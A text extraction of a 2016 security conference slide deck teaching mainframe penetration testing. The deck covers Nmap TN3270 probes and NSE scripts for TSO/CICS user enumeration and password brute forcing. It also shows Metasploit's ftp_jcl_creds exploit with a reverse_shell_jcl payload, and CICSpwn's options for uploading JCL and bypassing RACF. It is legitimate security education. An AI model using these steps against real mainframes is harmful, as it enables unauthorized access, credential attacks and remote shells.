advanced mainframe hacking · nmap scripting engine (nse) •composed of libraries and scripts...

VANGUARD SECURITY & COMPLIANCE 2016

Philip Young

ZedSec 390

CST08

Advanced Mainframe Hacking

SECURITY & COMPLIANCE CONFERENCE 2016


Disclaimer

I’m not here in the name of or on behalf of my employer. All opinions expressed here are my own.


The following are trademarks or registered trademarks of the International Business Machines Corporation:

Java and all Java-based trademarks are trademarks of Oracle and/or its affiliates.

UNIX is a registered trademark of The Open Group in the United States and other countries.

Microsoft, Windows and Windows NT are registered trademarks of Microsoft Corporation.

Linux® is the registered trademark of Linus Torvalds in the U.S. and other countries.

Kali Linux is a trademark of Offensive Security.

macOS is a trademark of Apple Inc.

Metasploit is a registered trademark of Rapid7 LLC.

VMware is a registered trademark of VMware, Inc.

Other company, product and service names may be trademarks or service marks of others.

Trademarks

CICS

CICSPlex

DB2

eServer

IBM

IBM z

IBM z Systems

IBM z13

S/390

System z

System z9

System z10

System/390

VTAM

WebSphere

z Systems

z9

z10

z13

z/Architecture

z/OS

z/VM

zEnterprise

IMS

MQSeries

MVS

NetView

OS/390

Parallel Sysplex

RACF

RMF

About Me!


Purpose

This session will:

• Go over the tools introduced in yesterdays keynote

• Explain what’s going on behind the scenes

• Show you how to use the tools


Tools Covered

• Nmap

• Metasploit

• CICSpwn

• Python (NJE/TN3270 Library)

• John the Ripper

• BIRP


Platform

• Linux (Kali Linux)

• Vmware

• macOS

• VPS


Kali Linux

• A Linux distrubution

• Comes pre-loaded with multiple tools:

• BURP • Metasploit • BeeF • Many more


Nmap

• Network MAP

• Uses various techniques to discover open ports

• E.G. “Syn Scan”


Service Probes

• Identify what is running on a port

• Uses TCP/UDP probes


Nmap

• Created in 1997

• By: Fyodor

• Mostly ‘C’

• Includes Service Detection

• Added Scripting Engine in ‘07


Nmap Probes

• Use the flag: ‘-sV’

• Null Probe:

Matches data sent to Nmap

• Approx 4,000 ‘Null Probes’

Let’s look at TN3270*: match tn3270 m|^\xff\xfd\x1d| p/IBM Telnet TN3270/ i/3270-REGIME/

* line 4606 in nmap-service-probes


TN3270 Null Probe

match -> ‘Match the following’

Tn3270 -> ‘with tn3270’

m|^\xff\xfd\x1d|

\xff\xfd\x1d = IAC DO TN3270E

p/IBM Telnet TN3270/ = Set to ‘IBM Telnet…’


Other Probes

• TCP Probes

• Send Data, inspect reply

• For example Network Job Entry Probe:


NJE Probe

• Sends an invalid NJE ‘OPEN’ packet

• Waits for either ‘ACK’ or ‘NAK’ in EBCDIC

Nmap without Service Probes

Nmap WITH Service Probes


Nmap Scripting Engine (NSE)

• Composed of Libraries and scripts

• Over 530 scripts available

• 121 Libraries

•Uses Lua


NSE Categories

AUTH

BROADCAST

BRUTE

DEFAULT

DISCOVERY

DOS

EXPLOIT

EXTERNAL

FUZZER

INTRUSIVE

MALWARE

SAFE

VERSION

VULN


TN3270 NSE Library

• A ‘virtual’ TN3270 terminal written in Lua

•Available: https://github.com/zedsec390/NMAP

• Allows for the following:

https://github.com/zedsec390/NMAP




Invoke

• To invoke scripts use the flag

--script (\ is line continuation in linux)

nmap -sV\

--script tn3270-screen


Additional TN3270 Scripts

• VTAM® Applid Enumeration

• TSO: • User ID Enumeration • Password Brute Force

• CICS®:

• Transaction Enumeration • User ID Enumeration • User Password Brute Forcing


TSO User Enumeration

• Let’s walk through the arguments: • Note the Libraries: brute & unpwdb

Argument Definition

brute.maxthreads=100 Max number of concurrent connections. Set to 100.

userdb=‘/tmp/users.txt’ File with usernames you want to test.

tso-enum.commands=‘TSOL5’ The command used to get to TSO.


CICS Transaction Enumeration Argument Definition

brute.maxthreads=100 Max number of concurrent connections. Set to 100.

idlist=‘/tmp/users.txt’ File with CICS transactions you’re looking for.

cics-enum.commands=‘CICSTS29’ The command used to get to the CICS region.

cics-enum.path=‘/home/test’ Successfully identified transaction screenshots will be placed in this folder.


Metasploit Framework

• Developed by H.D. Moore 2003

• Moved to Ruby in 2007

• Created an easy to use exploit platform

• Chad Rikansrud (@bigendiansmalls) add JCL and z/OS® architecture support in 2016


Using MSF

• Run ‘msfconsole’

• To list all exploits: show exploits

• Run the ONLY z/os ‘exploit’ use exploit/mainframe/ftp/ftp_jcl_creds

• Show the options with: show options

• Fill in the options you need

• Select which ‘payload’ you want to use


Set options

• Exploit options:

Option Definition

FTPUSER User ID to use.

FTPPASS Password to use.

RHOST FTP Hostname/IP address of target LPAR

RPORT FTP port (use Nmap)


Metasploit Payload Options

Now select a payload: set payload cmd/mainframe/reverse_shell_jcl

Change the payload options:

Option Definition

LHOST Our Hostname or IP address

LPORT The port you want metasploit to open a listener on.


CICSpwn

• Release this year by Ayoul

• Relies on CEMT/CEDA transaction IDs (for now)

• Uses CEMT to upload and execute JCL/REXX

• Can be used to assess CICS and break in to environments

• Requires Python 2.7


Interesting Options

Invoke with: python cicspwn

Flag Definition

-i Gather information

-A Test all options

-s Upload JCL to be executed by CICS user (requires CEMT)

--bypass Will bypass RACF® if CEDA is available.

Where To From

Here?


Escalation

• So far only network based

• What happens after access is granted?


Some Ideas

• Storage ‘scrapers’ to gather system information (think ‘IPLINFO’ but built in to metasploit)

• Automated APF tools to attempt privilege escalation through zapping APF authorized modules

• Data dumping tools to grab all datasets

• SMP/E corruption


Why Not?

• Make your own tools?

I’d prefer the tools come with what the experts need, so they have it without knowing about it

Contact:

mainframed767@g

mail.com

@mainframed767


Thank you!

SECURITY & COMPLIANCE CONFERENCE 2016

advanced mainframe hacking · nmap scripting engine (nse) •composed of libraries and scripts...

Documents